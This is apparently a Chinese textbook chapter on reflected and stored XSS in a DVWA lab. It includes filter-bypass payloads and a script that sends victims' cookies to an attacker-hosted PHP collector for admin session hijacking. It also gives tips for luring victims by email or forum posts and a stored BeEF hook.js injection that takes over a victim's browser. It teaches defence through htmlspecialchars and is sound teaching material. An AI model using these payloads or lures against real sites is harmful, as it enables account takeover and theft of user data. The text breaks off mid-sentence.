··【項目12】跨站腳本攻擊XSS攻防實訓1反彈型XSS攻防學習目標：學習反彈型XSS攻擊的原理，探討攻擊者如何巧妙地利用網(wǎng)頁中的漏洞來執(zhí)行惡意腳本，進而可能導致用戶數(shù)據(jù)的泄露。通過項目實踐，能夠更加深入地理解這些防御策略的工作原理，并掌握如何在實際開發(fā)中應用這些措施，從而顯著提高網(wǎng)站的安全防護能力。場景描述：在虛擬機環(huán)境下設置3個虛擬系統(tǒng)Kali、Win10（1）和Win10（3），確保這些系統(tǒng)可以互相通信，網(wǎng)絡拓撲如圖12-3所示，本章所有項目均在該場景中進行操作。圖12-3網(wǎng)絡拓撲任務1反彈型XSS攻防的初步認識實施過程：（1）在Kali主機中訪問Win10（3）服務器的DVWA主頁，設置DVWASecurity為“Low”，打開XSS（Reflected）頁面，單擊“ViewSource”按鈕，查看服務器核心源代碼，如圖12-4所示?？梢钥吹酱a直接引用了name參數(shù)，并沒有任何的過濾與檢查，存在明顯的XSS漏洞。圖12-4查看Low級源代碼（2）在文本框中輸入“<script>alert('xss')</script>”，然后單擊“Submit”按鈕，成功彈出對話框，如圖12-5所示。圖12-5成功彈框（3）設置DVWASecurity為“Medium”，打開XSS（Reflected），查看服務器核心源代碼，如圖12-6所示?？梢钥吹竭@里對輸入進行了過濾，使用str_replace()函數(shù)將輸入中的“<script>”替換為空。圖12-6查看Medium級源代碼（4）這種防護機制是基于黑名單的思想，可以被輕松繞過的。方法一：雙寫繞過輸入“<sc<script>ript>alert('xss')</script>”，成功彈出對話框。方法二：大小寫混淆繞過輸入“<ScRipt>alert('xss')</script>”，成功彈出對話框。（5）設置DVWASecurity為“High”，然后打開XSS（Reflected），查看服務器核心源代碼，如圖12-7所示?？梢钥吹剑琀igh級別的代碼同樣使用黑名單過濾輸入，preg_replace()函數(shù)用于正規(guī)表達式的搜索和替換，這使得雙寫繞過、大小寫混淆繞過不再有效。圖12-7查看High級源代碼（6）雖然無法使用<script>標簽注入XSS代碼，但是可以通過img、body等標簽的事件或者iframe等標簽的src注入惡意的js代碼。這里我們在文本框中輸入“<imgsrc=1onerror=alert(document.cookie)>”，這條語句表示在網(wǎng)頁中插入一張圖片，“src=1”指定了圖片文件的URL，如果圖片不存在（這里肯定是不存在），那么將會彈出錯誤提示框，從而實現(xiàn)彈出對話框的效果，如圖12-8所示。圖12-8返回Cookie值（7）設置DVWASecurity為“Impossible”，然后打開XSS（Reflected），查看服務器核心源代碼，如圖12-9所示。可以看到，Impossible級別的代碼使用htmlspecialchars函數(shù)把預定義的字符，如&、”、

’、<、>這些敏感符號都進行轉(zhuǎn)義，阻止瀏覽器將其作為HTML元素。所有的跨站語句中基本都離不開這些符號，因而只要這一個函數(shù)就阻止了XSS漏洞，所以跨站漏洞的代碼防御還是比較簡單的。圖12-9查看Impossible級源代碼任務2獲取管理員權限攻擊者利用反彈型XSS攻擊，獲取受害者的Cookie，從而使得自己從普通用戶升級為管理員用戶。因為這個項目實施是想獲取受害者的Cookie，因此需要受害者在點擊反射型URL的時候，受害者是以管理員的身份登錄到DVWA系統(tǒng)中，而且必須在同一個瀏覽器中進行這兩個操作。實施過程：（1）在Kali的/var/www/html/目錄下存放一個文件xss_hacker.php，其內(nèi)容如圖12-10所示，該php文件的主要功能是接收客戶端發(fā)送的Cookie信息，并保存到cookie.txt文件中。圖12-10xss_hacker.php文件內(nèi)容（2）在Kali的終端中輸入命令“serviceapache2start”，啟動Apache服務器，輸入命令“chmod777/var/www/html/xss_hacker.php”，使得用戶對xss_hacker.php文件都具有讀、寫和執(zhí)行的權限，輸入命令“chmod777/var/www/html”，使得用戶對html目錄都具有讀、寫和執(zhí)行的權限，如圖12-11所示。圖12-11配置Apache服務器（3）在Kali中，用瀏覽器打開Win10（3）服務器的DVWA主頁，以普通用戶gordonb登錄系統(tǒng)，其密碼是“abc123”。（4）設置DVWASecurity為“Low”，然后打開XSS（Reflected）頁面，輸入<script>window.open("0/xss_hacker.php?cookie="+document.cookie);</script>單擊“Submit”按鈕，如圖12-12所示，此時得到反射型攻擊URL如下：/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.open%28%22http%3A%2F%2F0%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E#圖12-12生成反射型攻擊URL（5）攻擊者可以采取各種手段，包括群發(fā)E-mail，在各種論壇網(wǎng)站發(fā)布此攻擊URL，以及創(chuàng)建吸引人的鏈接等，引誘受害者打開該反射型攻擊URL。（6）受害者在Win10（1）中打開Win10（3）服務器的DVWA主頁，以管理員用戶admin登錄系統(tǒng)。（7）此時如果受害者收到攻擊者發(fā)送過來的反射型攻擊URL，或者瀏覽黑客所偽造的釣魚網(wǎng)站，并在同一個瀏覽器中打開該反射型攻擊URL，就會執(zhí)行有關腳本，打開攻擊者指定的網(wǎng)頁xss_hacker.php，把受害者自己的Cookie值發(fā)送給攻擊者，并記錄在cookie.txt文件中，如圖12-13所示。圖12-13獲取的Cookie值（8）在Kali中，打開FireFox瀏覽器，單擊“Extensions”按鈕，然后在查找欄中輸入要查找的擴展“EditThisCookie”，如圖12-14所示。選擇需要安裝的擴展，單擊“AddtoFirefox”安裝該擴展，如圖12-15所示。（這一步過程中需要設置Kali能夠訪問Internet）圖12-14擴展和主題頁面圖12-15添加“EditThisCookie”擴展（9）在Kali中利用EditThisCookie擴展，修改DVWA登錄的PHPSESSID為cookie.txt所記錄的值并提交，如圖12-16所示。圖12-16修改PHPSESSID（10）刷新頁面，發(fā)現(xiàn)攻擊者的登錄用戶已經(jīng)變成admin，從而獲得管理員權限，如圖12-17所示。圖12-17登錄用戶變成admin實訓2存儲型XSS攻防任務1存儲型XSS攻防的初步認識實施過程：（1）在Kali主機中訪問Win10（3）服務器的DVWA主頁，設置DVWASecurity為“Low”，然后打開XSS（Stored），查看服務器核心源代碼，可以看到該頁面對輸入并沒有做XSS方面的過濾與檢查，且把輸入的數(shù)據(jù)存儲在服務器的數(shù)據(jù)庫中，因此這里存在明顯的存儲型XSS漏洞。（2）在Message文本框中輸入“<script>alert('xss')</script>”，然后單擊“SignGuestbook”按鈕，成功彈出對話框，如圖12-18所示。圖12-18成功彈框（3）因為腳本已經(jīng)寫到服務器的數(shù)據(jù)庫中，因此當其他用戶訪問該頁面時，也會彈出對話框。我們在Win10（1）主機中打開DVWA的XSS（Stored）時，發(fā)現(xiàn)也會彈出對話框。（4）分別設置DVWASecurity為“Medium”和“High”，由于message參數(shù)使用了htmlspecialchars函數(shù)進行編碼，因此無法通過message參數(shù)注入XSS代碼，但是對于name參數(shù)并沒有嚴格過濾，仍然存在存儲型XSS漏洞，其繞過的方法與反射型XSS的繞過方法相似，這里就不再重復。由于Name文本框的最大長度限制為10個字符，可以在Name文本框中右鍵，在彈出的快捷菜單中選擇“Inspect”屬性，修改長度限制“maxlength=50”，如圖12-19所示。圖12-19修改長度限制任務2利用BeEF實現(xiàn)對受害機的控制實施過程：（1）在Kali終端中輸入命令“apt-getupdate”，更新軟件包列表。輸入命令“apt-getinstallbeef-xss”安裝BeEF。安裝完成后輸入命令“beef-xss”，啟動BeEF工具，在終端中顯示管理頁面地址及使用的腳本的方法，如圖12-20所示，第一次啟動會提示輸入密碼。圖12-20運行BeEF工具（2）在管理頁面中輸入登錄信息并進入BeEF管理平臺，用戶名是“beef”，如圖12-21所示。圖12-21登錄管理平臺BeEF（3）在Kali中打開Win10（3）服務器的DVWA主頁。設置DVWASecurity為“Low”，然后打開XSS（Stored），由于Message文本框的最大長度限制為50個字符，可以在Message文本框中右鍵，在彈出的快捷菜單中選擇“Inspect”屬性，修改長度限制“maxlength=500”。Name文本框中輸入“xss”（內(nèi)容可隨意輸入），在Message文本框中輸入“<scriptsrc="0:3000/hook.js"></script>”，單擊“SignGuestbook”按鈕，把腳本保存到數(shù)據(jù)庫中，如圖12-22所示。圖12-22插入XSS腳本（4）受害者在Win10（1）中打開Win10（3）服務器的DVWA主頁，當受害者訪問XSS（Stored）頁面時，瀏覽器自動執(zhí)行腳本訪問攻擊者的hook.js鉤子頁面，連接到攻擊主機Kali。（5）在Kali的BeEF的管理頁面中，發(fā)現(xiàn)了受害者的圖標，攻擊成功如圖12-23所示。圖12-23XSS攻擊成功（6）在被鉤住的持續(xù)時間里，受害主機被控制了，攻擊者可以發(fā)送攻擊命令。選擇“Commands”選項卡，可以看到很多已經(jīng)分好類的攻擊模塊，如圖12-24所示，攻擊命令的顏色含義如下。綠色：該攻擊模塊命令可用，隱蔽性強。橘色：該攻擊模塊命令可用，但受害者可能會發(fā)現(xiàn)它。橙色：該攻擊模塊是否可用需待驗證，可以直接試驗。灰色：該攻擊模塊不可用。圖12-24BeEF界面BeEF的功能非常強大，這里我們只介紹其中的幾個功能。單擊“Browser”→“HookedDomai